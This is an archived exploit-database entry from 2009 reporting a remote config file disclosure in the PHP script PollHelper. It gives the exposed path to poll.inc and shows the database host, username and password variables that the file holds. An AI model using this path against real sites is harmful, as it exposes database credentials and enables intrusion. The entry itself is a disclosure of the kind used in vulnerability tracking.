exploit-db-mirror/platforms/php/webapps/7690.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

26 lines
775 B
Text
Executable file

Remote Config File Disclosure
----------------------------------------------------
script: PollHelper
***************************************************************************
download from:http://www.freedville.com/oss/PollHelper.zip
***************************************************************************
vul:
www.site.com/path/poll.inc
...............................
$dbhost = "";
$dbusername = "";
$dbuserpass = "";
$default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------
*************************************************
Author: ahmadbady
*************************************************
# milw0rm.com [2009-01-06]